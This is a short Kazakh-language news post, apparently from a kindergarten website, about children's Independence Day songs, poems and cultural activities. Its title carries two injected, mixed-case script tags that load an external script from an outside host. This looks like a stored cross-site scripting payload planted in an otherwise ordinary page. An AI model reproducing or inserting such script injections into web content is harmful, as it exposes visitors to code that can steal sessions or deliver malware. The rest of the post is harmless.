Елімізді сүйеміз<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
15.12.2022
16 желтоқсан - Тәуелсіздік күніне арналған "Елімізді сүйеміз" атты тақырыптық шарада "Балауса" бөбекжай балабақшасының тәрбиеленушілері Отан туралы әндері мен тақпақтарын айтып, туған жеріне, Отанымызға деген махаббаттарын білдірді. Мемлекеттік рәміздер туралы білімдерін көрсетті. Қазақстанның әсем жерлері туралы бейнефильм тамашалап, "жайлаудағы" ата-әжелерінде қонақта болып, киіз үй құрып, атқа мінді. Балаларға қазақ халқының ұлттық болмысы мен мәдениеті дәріптелді.
Шапауова Саулеш Аштаевна, қазақ тілі мұғалімі
Просмотров: 744